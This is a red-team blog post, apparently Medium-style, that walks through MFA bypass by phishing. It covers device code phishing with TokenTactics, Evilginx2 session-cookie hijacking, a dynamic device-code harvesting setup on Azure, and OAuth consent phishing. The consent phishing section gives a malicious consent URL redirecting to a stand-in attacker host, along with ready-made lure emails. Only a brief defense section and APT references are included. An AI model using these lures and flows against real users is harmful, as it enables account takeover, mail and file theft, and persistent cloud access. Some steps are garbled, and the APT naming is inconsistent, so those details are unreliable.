Mastering Modern Red Teaming Infrastructure Part 7: Advanced Phishing Techniques for 2FA Bypass…

With organizations heavily relying on MFA/2FA for protection, red teamers and threat actors have adapted.
They no longer just steal passwords — they steal access by hijacking tokens, abusing OAuth flows, and bypassing 2FA completely.

In Part 7 of the “Mastering Modern Red Teaming Infrastructure” series, I will walk you through practical 2FA bypass attacks that simulate real-world adversaries include Device Code Phishing, Dynamic Device Code Flows, Consent and Permissions Attacks, and Evilginx2-based Session Hijacking.

Each technique includes a clear step-by-step flow based on modern offensive tradecraft.

Device Code Phishing — Static Approach
Evilginx2— Man-in-the-Middle Phishing with Session Hijacking
Dynamic Device Code Phishing — Live Code Phishing
Consent and Permissions Phishing (OAuth Consent Grant)
Why These Attacks Work
Real-World APT Examples: Who Uses These Techniques?
Final Thought

1. Device Code Phishing — Static Approach

Concept: Abuse the OAuth 2.0 Device Authorization Grant to capture authenticated sessions without stealing passwords.

Device Code Phishing exploits the OAuth 2.0 Device Authorization Grant flow by tricking victims into authorizing a malicious application. Attackers convince users to visit a legitimate cloud provider’s domain — such as Microsoft’s microsoft.com/devicelogin or Google’s google.com/device — and enter a legitimate-looking code. Once the victim submits the code and grants consent, the attacker obtains access tokens to access the victim’s resources, bypassing traditional credential-based protections and even multi-factor authentication (2FA).

This method is highly dangerous because it often bypasses traditional MFA protections — the authentication happens separately and outside the phishing page itself.

⚡ Microsoft Warning:
In February 2025, Microsoft issued a strong caution regarding Storm-2372, an active APT group conducting widespread Device Code Phishing campaigns targeting Microsoft 365 users. (Source)
Microsoft emphasized that this technique is rapidly growing among APTs because it abuses legitimate device login workflows and stealthily bypasses MFA.

Device Code Phishing is no longer theoretical; it is now widely exploited in the wild by advanced threat actors for gaining persistent access to cloud environments without raising standard alerting mechanisms.

Steps:

1.1 Initiate Device Code Request (I will use the TokenTactics tool):

1.2. Send Phishing Email

Email user with a link to https://microsoft.com/devicelogin
Instruct user to enter the provided user_code (you control it). here the code is LCSDQKUPQ

1.3. Poll for Authentication

When the victim enters the code and logs in, you immediately receive an access token.

**TokenTactics R**eceive an **access token after victim authentication**

1.4. Access Victim’s Resources

Use the stolen victim token to call graph APIs and access (e.g., Outlook, OneDrive, Teams, SharePoint, and other company user PII info).

You can use my tool on GitHub or another to access and search/download a victim’s Office 365 emails using their stolen access token.

Note: This code assumes the token is authorized for Mail.Read or Mail.ReadWrite scopes. Always ensure you have proper authorization when using Microsoft Graph.

2. Evilginx2 — Man-in-the-Middle Phishing with Session Hijacking

Concept : proxy real login pages while silently stealing credentials and session cookies.

✅ Result : Full session hijack even against hardware-backed MFA.

Steps :

2.1 Open Evilginx2

2.2 Add Your Domain and IP and Hostname to Evilginx2

2.3 Enable Office 365 module and create lure (landing page) + list it to see phishing URL page.

2.4 Send an email or SMS to the victim containing a link to the Evilginx landing page (https://login.online-notifications.net/kVQhKKxf). and the client opens it.

2.5 After the victim completes authentication with the 2FA, all his session cookies and email and password will be received on the Evilginx backend.

2.6 Replay Session : I will inject the victim's cookies into the browser and access his account portal or Azure service.

3. Dynamic Device Code Phishing — Live Code Phishing

Traditional Device Code Phishing requires sending a static user_code to the target, relying on them to act quickly before the code expires (typically within 15 minutes).
Dynamic Device Code Phishing improves this by generating the user_code only when the user clicks the phishing link, ensuring the code is always fresh and dramatically increasing the success rate.

To set up Dynamic Device Code Phishing, it will take a long time, so I will summarize it:

Deploy a static website (e.g., using Azure Static Web Apps) that fetches a fresh device_code and user_code via an API call when visited.
The website sends the device_code to a Function App (triggered over HTTP) inside the attacker's Azure tenant (nomoreoil.onmicrosoft.com).
The Function App continuously monitors the authentication status, automatically requesting access tokens once the victim authenticates.
If successful, the tokens are saved into a Storage Account Table Service for later retrieval.

Example Infrastructure Setup:

3.1 Static Website — Hosts the phishing page and uses jQuery to fetch device codes dynamically.

3.2 Function App — Handles device code monitoring and token harvesting using PowerShell.

3.3 Storage Account — Stores the captured access tokens securely.

This method ensures the phishing operation remains valid for longer, maximizing the window of opportunity to capture valid tokens.

In a Consent Phishing attack, instead of stealing the user’s credentials, the attacker tricks the user into granting OAuth permissions to a malicious application, allowing the attacker direct access to the user’s account data.

⚡ Recent Incidents:
In April 2025, major cybersecurity reports highlighted Russian APT groups exploiting Microsoft OAuth frameworks for large-scale espionage operations:

The Hacker News reported that attackers created rogue OAuth apps and tricked users into granting access, leading to unauthorized access to Microsoft 365 data without triggering normal credential theft detections. (Source)

Volexity’s detailed analysis described how threat actors phished for OAuth codes and abused Microsoft’s Device Code flow and OAuth workflows to maintain stealthy, persistent access inside cloud environments. (Source)

Consent and Permissions Phishing is extremely dangerous because it allows long-term access even after password resets or traditional incident response actions.

How the Attack Works (Example Flow)

4.1 Attacker registers a malicious app in Azure AD (or Google Cloud / any OAuth provider).

Example: “SecureMail Reader” or “Company Document Viewer”.

4.2 Attacker crafts a malicious OAuth Consent URL like this:

https://login.microsoftonline.com/common/oauth2/v2.0/authorize? 
client_id=ATTACKER_APP_ID 
&response_type=code 
&redirect_uri=https://attacker-website.com/callback 
&response_mode=query 
&scope=Mail.Read%20offline_access%20User.Read 
&state=random_state_value

Key parts:

client_id = Attackers' app ID
scope = Sensitive permissions like Mail.Read, offline_access, Files.Read, User.Read
redirect_uri = Attackers' server to capture the authorization code

4.3 Victim receives a phishing email like:

“You need to authorize SecureMail Reader to continue accessing your company emails securely. Click here to approve.”

4.4 Victim clicks the link and sees a legitimate Microsoft or Google OAuth consent screen requesting the permissions (because the app is real but malicious).

4.5 Victim clicks “Accept” thinking it’s normal.

4.6 Attacker receives an OAuth authorization code, exchanges it for an access token, and can now:

Read all the victim’s emails (Mail.Read)
Access OneDrive files (Files.Read)
Profile information (User.Read)
Refresh tokens silently (offline_access)

⚡ No need for username or password — just abuse the granted access token.

Realistic Example Scenario

The attacker registers an app called “Work From Home Secure Portal”.
Sends the victim an email saying:

“Due to new work-from-home policies, all employees must authorize the new Secure Portal app by clicking below.”

The link brings them to the real Microsoft OAuth consent screen, requesting: Mail.Read and Files.Read and offline_access
The victim clicks “Accept” — thinking it’s legitimate.
Attacker can now read all emails, download sensitive files, and refresh access without user interaction.

Key Techniques Used:

Legitimate OAuth flow (no password stealing)
Social engineering through trust (real Microsoft page)
Abuse of permissions granted by the user (not technical vulnerabilities)

How to Defend Against It:

Enable OAuth app consent policies (require admin approval for risky apps)
Restrict third-party app registrations
Educate users about unexpected consent requests
Monitor OAuth grants in the organization

Why These Attacks Work

Modern identity systems trust tokens more than passwords:

Once a session token is issued after 2FA, it’s treated as valid until expiry.
OAuth apps are often trusted too much (users rarely read scopes carefully).
Defenders monitor logins — but not always app grants or token theft.

Thus, post-authentication artifacts are the new target.

Real-World APT Examples: Who Uses These Techniques?

Advanced threat actors and APT groups are increasingly adopting phishing techniques that bypass traditional MFA through OAuth abuse, session hijacking, and advanced cloud-targeted methods. Some real-world examples include:

In February 2025, Storm-1295 (Microsoft naming)—Engaged in device code phishing targeting Microsoft 365 users to bypass MFA and gain persistent cloud access without needing user passwords.
In April 2025, Russian hackers exploited Microsoft OAuth applications by registering rogue apps and phishing users for consent grants, bypassing passwords, MFA, and traditional detection.
APT29 (Cozy Bear)—Famous for using consent and permissions phishing attacks during campaigns targeting government and healthcare sectors, including the 2020 SolarWinds-related operations.
Midnight Blizzard (Nobelium)—Conducted sophisticated OAuth consent phishing campaigns, creating rogue apps to harvest emails, files, and cloud resources.
Unattributed Threat Actors—Regular use of Evilginx2 and similar MITM phishing kits to steal session cookies from executives (C-level) in fintech, technology, and defense sectors.
Crimson Kingsnake — Utilized dynamic device phishing tactics, impersonating legal and financial brands to execute advanced BEC (Business Email Compromise) attacks, bypassing MFA protections.

These real-world cases show that advanced phishing campaigns are no longer rare — they are an essential part of modern APT initial access toolkits, especially against cloud-first and hybrid organizations.

Final Thought

Mastering modern phishing attacks requires more than spoofed login pages.

As organizations continue their journey into cloud ecosystems, adversaries are shifting their tactics to attack identity, sessions, and user trust rather than just passwords.
Techniques like Device Code Phishing and Consent Grant Attacks expose the weakness of relying solely on MFA, while Evilginx2 demonstrates the dangerous potential of live session hijacking.
For defenders and red teams alike, understanding and simulating these attack paths is crucial to building true resilience against modern threats.

Next: Eyes open — we dive deeper into the shadows, shifting from 2FA bypasses into hardcore credential theft, unleashing Browser-in-the-Browser (BitB) illusions, Click-Fix exploits, and Captcha Copy-Paste traps in Part 8.

If you find this blog useful, don’t forget to hit the clap button and follow the blog.

Certifications:
OSEC3, CRTL, CRTO, OSCP, OSEP, OSWE, OSED, eMAPT … Others

Follow me on LinkedIn & Twitter(X) to stay updated and to know new things.

Bye Bye, Take Care.

Mastering Modern Red Teaming Infrastructure Part 7: Advanced Phishing Techniques for 2FA Bypass…

Table of Contents